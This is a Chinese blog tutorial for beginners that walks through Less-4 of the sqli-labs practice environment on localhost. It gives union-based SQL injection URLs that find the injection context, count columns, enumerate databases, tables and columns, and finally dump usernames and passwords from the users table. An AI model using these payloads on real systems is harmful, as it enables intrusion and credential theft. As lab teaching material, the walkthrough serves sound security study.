sqli-labs-less-4图文详解,适合小白

Less-4

less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!!
less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。

判断注入:

http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 显示正常(两个单引号)
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 显示错误(一个双引号),错误:’“2"”) LIMIT 0,1’,出现一个)
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 显示正常,判断原数据输入后应该为(“id”)
在这里插入图片描述

判断字段列数:

http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+
在这里插入图片描述
显示Unknown column ‘10’ in ‘order clause’,说明字段列数少于10,继续缩小数值进行测试。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常显示,表明字段列数为3
在这里插入图片描述

判断可回显位:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+
在这里插入图片描述

判断当前数据库:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+
在这里插入图片描述

判断当前用户:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+

查看所有数据库:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
在这里插入图片描述

查看当前数据库中的所有表:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
在这里插入图片描述

查看users表中的字段:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
在这里插入图片描述

输出username:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+
在这里插入图片描述

输出password:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+
在这里插入图片描述

将username和password连接并联合输出:

http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+
在这里插入图片描述

Less-4结束

。。。未完待续

©️2020 CSDN 皮肤主题: 1024 设计师:上身试试 返回首页